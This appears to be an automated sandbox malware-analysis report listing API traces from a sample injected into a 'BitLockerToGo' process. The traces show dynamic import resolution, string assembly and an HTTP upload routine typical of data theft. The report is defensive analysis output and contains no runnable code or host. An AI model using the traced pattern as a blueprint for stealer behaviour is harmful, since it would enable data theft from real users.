                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DAE08), ref: 02769E14
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DAE20), ref: 02769E2C
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DAE80), ref: 02769E44
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DE928), ref: 02769E5D
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DADD8), ref: 02769E75
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DAE68), ref: 02769E8D
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DAE38), ref: 02769EA6
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DAE50), ref: 02769EBE
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DADF0), ref: 02769ED6
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DAE98), ref: 02769EEF
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029E4FC8), ref: 02769F07
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029E4FE0), ref: 02769F1F
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029E4FF8), ref: 02769F38
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029D95F8), ref: 02769F50
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029E4F38), ref: 02769F68
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029E4D70), ref: 02769F81
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DEA68), ref: 02769F99
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029E4DB8), ref: 02769FB1
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DEA88), ref: 02769FCA
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029E4D10), ref: 02769FE2
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029E4F50), ref: 02769FFA
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DE948), ref: 0276A013
                                                                                                                                                      • GetProcAddress.KERNEL32(74DD0000,029DE988), ref: 0276A02B
                                                                                                                                                      • LoadLibraryA.KERNEL32(029E4DD0,?,02765CA3,?,00000034,00000064,02766600,?,0000002C,00000064,027665A0,?,00000030,00000064,Function_00015AD0,?), ref: 0276A03D
                                                                                                                                                      • LoadLibraryA.KERNEL32(029E4DE8,?,02765CA3,?,00000034,00000064,02766600,?,0000002C,00000064,027665A0,?,00000030,00000064,Function_00015AD0,?), ref: 0276A04E
                                                                                                                                                      • LoadLibraryA.KERNEL32(029E4E00,?,02765CA3,?,00000034,00000064,02766600,?,0000002C,00000064,027665A0,?,00000030,00000064,Function_00015AD0,?), ref: 0276A060
                                                                                                                                                      • LoadLibraryA.KERNEL32(029E4EA8,?,02765CA3,?,00000034,00000064,02766600,?,0000002C,00000064,027665A0,?,00000030,00000064,Function_00015AD0,?), ref: 0276A072
                                                                                                                                                      • LoadLibraryA.KERNEL32(029E4F68,?,02765CA3,?,00000034,00000064,02766600,?,0000002C,00000064,027665A0,?,00000030,00000064,Function_00015AD0,?), ref: 0276A083
                                                                                                                                                      • LoadLibraryA.KERNEL32(029E4D28,?,02765CA3,?,00000034,00000064,02766600,?,0000002C,00000064,027665A0,?,00000030,00000064,Function_00015AD0,?), ref: 0276A095
                                                                                                                                                      • LoadLibraryA.KERNEL32(029E4D40,?,02765CA3,?,00000034,00000064,02766600,?,0000002C,00000064,027665A0,?,00000030,00000064,Function_00015AD0,?), ref: 0276A0A7
                                                                                                                                                      • LoadLibraryA.KERNEL32(029E4E78,?,02765CA3,?,00000034,00000064,02766600,?,0000002C,00000064,027665A0,?,00000030,00000064,Function_00015AD0,?), ref: 0276A0B8
                                                                                                                                                      • GetProcAddress.KERNEL32(75290000,029DEBE8), ref: 0276A0DA
                                                                                                                                                      • GetProcAddress.KERNEL32(75290000,029E4D88), ref: 0276A0F2
                                                                                                                                                      • GetProcAddress.KERNEL32(75290000,029E4A48), ref: 0276A10A
                                                                                                                                                      • GetProcAddress.KERNEL32(75290000,029E4F80), ref: 0276A123
                                                                                                                                                      • GetProcAddress.KERNEL32(75290000,029DEAA8), ref: 0276A13B
                                                                                                                                                      • GetProcAddress.KERNEL32(6FD40000,029E00E0), ref: 0276A160
                                                                                                                                                      • GetProcAddress.KERNEL32(6FD40000,029DEC08), ref: 0276A179
                                                                                                                                                      • GetProcAddress.KERNEL32(6FD40000,029E0068), ref: 0276A191
                                                                                                                                                      • GetProcAddress.KERNEL32(6FD40000,029E4E30), ref: 0276A1A9
                                                                                                                                                      • GetProcAddress.KERNEL32(6FD40000,029E4D58), ref: 0276A1C2
                                                                                                                                                      • GetProcAddress.KERNEL32(6FD40000,029DEB88), ref: 0276A1DA
                                                                                                                                                      • GetProcAddress.KERNEL32(6FD40000,029DEAC8), ref: 0276A1F2
                                                                                                                                                      • GetProcAddress.KERNEL32(6FD40000,029E4E18), ref: 0276A20B
                                                                                                                                                      • GetProcAddress.KERNEL32(752C0000,029DEAE8), ref: 0276A22C
                                                                                                                                                      • GetProcAddress.KERNEL32(752C0000,029DEB68), ref: 0276A244
                                                                                                                                                      • GetProcAddress.KERNEL32(752C0000,029E4DA0), ref: 0276A25D
                                                                                                                                                      • GetProcAddress.KERNEL32(752C0000,029E4F98), ref: 0276A275
                                                                                                                                                      • GetProcAddress.KERNEL32(752C0000,029DEBA8), ref: 0276A28D
                                                                                                                                                      • GetProcAddress.KERNEL32(74EC0000,029DFF00), ref: 0276A2B3
                                                                                                                                                      • GetProcAddress.KERNEL32(74EC0000,029E0108), ref: 0276A2CB
                                                                                                                                                      • GetProcAddress.KERNEL32(74EC0000,029E4E48), ref: 0276A2E3
                                                                                                                                                      • GetProcAddress.KERNEL32(74EC0000,029E5798), ref: 0276A2FC
                                                                                                                                                      • GetProcAddress.KERNEL32(74EC0000,029E5738), ref: 0276A314
                                                                                                                                                      • GetProcAddress.KERNEL32(74EC0000,029E00B8), ref: 0276A32C
                                                                                                                                                      • GetProcAddress.KERNEL32(75BD0000,029E4E60), ref: 0276A352
                                                                                                                                                      • GetProcAddress.KERNEL32(75BD0000,029E5678), ref: 0276A36A
                                                                                                                                                      • GetProcAddress.KERNEL32(75BD0000,029E4928), ref: 0276A382
                                                                                                                                                      • GetProcAddress.KERNEL32(75BD0000,029E4E90), ref: 0276A39B
                                                                                                                                                      • GetProcAddress.KERNEL32(75BD0000,029E4EC0), ref: 0276A3B3
                                                                                                                                                      • GetProcAddress.KERNEL32(75BD0000,029E5638), ref: 0276A3CB
                                                                                                                                                      • GetProcAddress.KERNEL32(75BD0000,029E5898), ref: 0276A3E4
                                                                                                                                                      • GetProcAddress.KERNEL32(75BD0000,029E4FB0), ref: 0276A3FC
                                                                                                                                                      • GetProcAddress.KERNEL32(75BD0000,029E4ED8), ref: 0276A414
                                                                                                                                                      • GetProcAddress.KERNEL32(75A70000,029E5658), ref: 0276A436
                                                                                                                                                      • GetProcAddress.KERNEL32(75A70000,029E4EF0), ref: 0276A44E
                                                                                                                                                      • GetProcAddress.KERNEL32(75A70000,029E4F08), ref: 0276A466
                                                                                                                                                      • GetProcAddress.KERNEL32(75A70000,029E4F20), ref: 0276A47F
                                                                                                                                                      • GetProcAddress.KERNEL32(75A70000,029E5028), ref: 0276A497
                                                                                                                                                      • GetProcAddress.KERNEL32(75450000,029E5698), ref: 0276A4B8
                                                                                                                                                      • GetProcAddress.KERNEL32(75450000,029E5818), ref: 0276A4D1
                                                                                                                                                      • GetProcAddress.KERNEL32(75DA0000,029E5858), ref: 0276A4F2
                                                                                                                                                      • GetProcAddress.KERNEL32(75DA0000,029E5040), ref: 0276A50A
                                                                                                                                                      • GetProcAddress.KERNEL32(6F070000,029E5578), ref: 0276A530
                                                                                                                                                      • GetProcAddress.KERNEL32(6F070000,029E5598), ref: 0276A548
                                                                                                                                                      • GetProcAddress.KERNEL32(6F070000,029E58B8), ref: 0276A560
                                                                                                                                                      • GetProcAddress.KERNEL32(6F070000,029E50D0), ref: 0276A579
                                                                                                                                                      • GetProcAddress.KERNEL32(6F070000,029E57D8), ref: 0276A591
                                                                                                                                                      • GetProcAddress.KERNEL32(6F070000,029E55D8), ref: 0276A5A9
                                                                                                                                                      • GetProcAddress.KERNEL32(6F070000,029E5878), ref: 0276A5C2
                                                                                                                                                      • GetProcAddress.KERNEL32(6F070000,029E5778), ref: 0276A5DA
                                                                                                                                                      • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0276A5F1
                                                                                                                                                      • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0276A607
                                                                                                                                                      • GetProcAddress.KERNEL32(75AF0000,029E50B8), ref: 0276A629
                                                                                                                                                      • GetProcAddress.KERNEL32(75AF0000,029E4978), ref: 0276A641
                                                                                                                                                      • GetProcAddress.KERNEL32(75AF0000,029E5010), ref: 0276A659
                                                                                                                                                      • GetProcAddress.KERNEL32(75AF0000,029E5088), ref: 0276A672
                                                                                                                                                      • GetProcAddress.KERNEL32(75D90000,029E5518), ref: 0276A693
                                                                                                                                                      • GetProcAddress.KERNEL32(6F8E0000,029E5058), ref: 0276A6B4
                                                                                                                                                      • GetProcAddress.KERNEL32(6F8E0000,029E56B8), ref: 0276A6CD
                                                                                                                                                      • GetProcAddress.KERNEL32(6F8E0000,029E5070), ref: 0276A6E5
                                                                                                                                                      • GetProcAddress.KERNEL32(6F8E0000,029E50A0), ref: 0276A6FD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                      • String ID: HttpQueryInfoA$InternetSetOptionA
                                                                                                                                                      • API String ID: 2238633743-1775429166
                                                                                                                                                      • Opcode ID: 169a7c9bb500b5fbdf2cb3e40de8a94f2f0fd69bba16c973b926d91334e39860
                                                                                                                                                      • Instruction ID: a325f5acdf1395cfc8de3a85613c7d21a39aaf408f992f82e1526d6cf7085783
                                                                                                                                                      • Opcode Fuzzy Hash: 169a7c9bb500b5fbdf2cb3e40de8a94f2f0fd69bba16c973b926d91334e39860
                                                                                                                                                      • Instruction Fuzzy Hash: 99623EB5D9C200AFD344DFAEE9A997637F9F79C3213248D1AA609C3214D73A9861CF50

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,0098967F,?,027661C4,?), ref: 02757724
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,027661C4), ref: 0275772B
                                                                                                                                                      • lstrcat.KERNEL32(?,029E18C8), ref: 027578DB
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 027578EF
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 02757903
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 02757917
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5DD0), ref: 0275792B
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5EC0), ref: 0275793F
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5DE8), ref: 02757952
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5E90), ref: 02757966
                                                                                                                                                      • lstrcat.KERNEL32(?,029E6100), ref: 0275797A
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 0275798E
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 027579A2
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 027579B6
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5DD0), ref: 027579C9
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5EC0), ref: 027579DD
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5DE8), ref: 027579F1
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5E90), ref: 02757A04
                                                                                                                                                      • lstrcat.KERNEL32(?,029E6168), ref: 02757A18
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 02757A2C
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 02757A40
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 02757A54
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5DD0), ref: 02757A68
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5EC0), ref: 02757A7B
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5DE8), ref: 02757A8F
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5E90), ref: 02757AA3
                                                                                                                                                      • lstrcat.KERNEL32(?,029E61D0), ref: 02757AB6
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 02757ACA
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 02757ADE
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 02757AF2
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5DD0), ref: 02757B06
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5EC0), ref: 02757B1A
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5DE8), ref: 02757B2D
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5E90), ref: 02757B41
                                                                                                                                                      • lstrcat.KERNEL32(?,029E6238), ref: 02757B55
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 02757B69
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 02757B7D
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 02757B91
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5DD0), ref: 02757BA4
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5EC0), ref: 02757BB8
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5DE8), ref: 02757BCC
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5E90), ref: 02757BDF
                                                                                                                                                      • lstrcat.KERNEL32(?,029E62A0), ref: 02757BF3
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 02757C07
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 02757C1B
                                                                                                                                                      • lstrcat.KERNEL32(?,?), ref: 02757C2F
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5DD0), ref: 02757C43
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5EC0), ref: 02757C56
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5DE8), ref: 02757C6A
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5E90), ref: 02757C7E
                                                                                                                                                        • Part of subcall function 027575D0: lstrcat.KERNEL32(2EE56020,027717FC), ref: 02757606
                                                                                                                                                        • Part of subcall function 027575D0: lstrcat.KERNEL32(2EE56020,00000000), ref: 02757648
                                                                                                                                                        • Part of subcall function 027575D0: lstrcat.KERNEL32(2EE56020, : ), ref: 0275765A
                                                                                                                                                        • Part of subcall function 027575D0: lstrcat.KERNEL32(2EE56020,00000000), ref: 0275768F
                                                                                                                                                        • Part of subcall function 027575D0: lstrcat.KERNEL32(2EE56020,02771804), ref: 027576A0
                                                                                                                                                        • Part of subcall function 027575D0: lstrcat.KERNEL32(2EE56020,00000000), ref: 027576D3
                                                                                                                                                        • Part of subcall function 027575D0: lstrcat.KERNEL32(2EE56020,02771808), ref: 027576ED
                                                                                                                                                        • Part of subcall function 027575D0: task.LIBCPMTD ref: 027576FB
                                                                                                                                                      • lstrcat.KERNEL32(?,029E4B48), ref: 02757E0B
                                                                                                                                                      • lstrcat.KERNEL32(?,029E53B8), ref: 02757E1E
                                                                                                                                                      • lstrlen.KERNEL32(2EE56020), ref: 02757E2B
                                                                                                                                                      • lstrlen.KERNEL32(2EE56020), ref: 02757E3B
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 928082926-0
                                                                                                                                                      • Opcode ID: a821f497a166ab396ece676356f5c787dace9228b543c3e1a1f0f51af6c58b57
                                                                                                                                                      • Instruction ID: ba47026854ca5abfefa050b06da29fc4852030d2e666fd45372acf372ebd354f
                                                                                                                                                      • Opcode Fuzzy Hash: a821f497a166ab396ece676356f5c787dace9228b543c3e1a1f0f51af6c58b57
                                                                                                                                                      • Instruction Fuzzy Hash: B53230B2D54314ABCB15EBA4DC8CDEE737DFB44710F444A88E619A2080EA74EB99CF51

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 1064 2755100-275522d call 276a7a0 call 27547b0 call 2768ea0 call 276aad0 lstrlen call 276aad0 call 2768ea0 call 276a740 * 5 InternetOpenA StrCmpCA 1087 2755236-275523a 1064->1087 1088 275522f 1064->1088 1089 27558c4-2755959 InternetCloseHandle call 2768990 * 2 call 276aa40 * 4 call 276a7a0 call 276a800 * 5 call 2751550 call 276a800 1087->1089 1090 2755240-2755353 call 2768b60 call 276a920 call 276a8a0 call 276a800 * 2 call 276a9b0 call 276a920 call 276a9b0 call 276a8a0 call 276a800 * 3 call 276a9b0 call 276a920 call 276a8a0 call 276a800 * 2 InternetConnectA 1087->1090 1088->1087 1090->1089 1153 2755359-2755367 1090->1153 1154 2755375 1153->1154 1155 2755369-2755373 1153->1155 1156 275537f-27553b1 HttpOpenRequestA 1154->1156 1155->1156 1157 27558b7-27558be InternetCloseHandle 1156->1157 1158 27553b7-2755831 call 276a9b0 call 276a8a0 call 276a800 call 276a920 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a920 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a920 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a920 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276a9b0 call 276a8a0 call 276a800 call 276aad0 lstrlen call 276aad0 lstrlen GetProcessHeap RtlAllocateHeap call 276aad0 lstrlen call 276aad0 memcpy call 276aad0 lstrlen memcpy call 276aad0 lstrlen call 276aad0 * 2 lstrlen memcpy call 276aad0 lstrlen call 276aad0 HttpSendRequestA call 2768990 1156->1158 1157->1089 1312 2755836-2755860 InternetReadFile 1158->1312 1313 2755862-2755869 1312->1313 1314 275586b-27558b1 InternetCloseHandle 1312->1314 1313->1314 1315 275586d-27558ab call 276a9b0 call 276a8a0 call 276a800 1313->1315 1314->1157 1315->1312
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0276A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0276A7E6
                                                                                                                                                        • Part of subcall function 027547B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 027547EA
                                                                                                                                                        • Part of subcall function 027547B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02754801
                                                                                                                                                        • Part of subcall function 027547B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02754818
                                                                                                                                                        • Part of subcall function 027547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02754839
                                                                                                                                                        • Part of subcall function 027547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 02754849
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 02755193
                                                                                                                                                        • Part of subcall function 02768EA0: CryptBinaryToStringA.CRYPT32(00000000,02755184,40000001,00000000,00000000,?,02755184), ref: 02768EC0
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02755207
                                                                                                                                                      • StrCmpCA.SHLWAPI(?,029E4B88), ref: 02755225
                                                                                                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02755340
                                                                                                                                                      • HttpOpenRequestA.WININET(00000000,029E4CC8,?,029E5F38,00000000,00000000,00400100,00000000), ref: 027553A4
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                        • Part of subcall function 0276A920: lstrcpy.KERNEL32(00000000,?), ref: 0276A972
                                                                                                                                                        • Part of subcall function 0276A920: lstrcat.KERNEL32(00000000), ref: 0276A982
                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,029E4BC8,00000000,?,029D98C8,00000000,?,027719DC,00000000,?,027651CF), ref: 02755737
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0275574B
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0275575C
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 02755763
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 02755778
                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000), ref: 0275578F
                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 027557A9
                                                                                                                                                      • memcpy.MSVCRT(?), ref: 027557B6
                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 027557C8
                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 027557E1
                                                                                                                                                      • memcpy.MSVCRT(?), ref: 027557F1
                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?), ref: 0275580E
                                                                                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 02755822
                                                                                                                                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0275584D
                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 027558B1
                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 027558BE
                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 027558C8
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
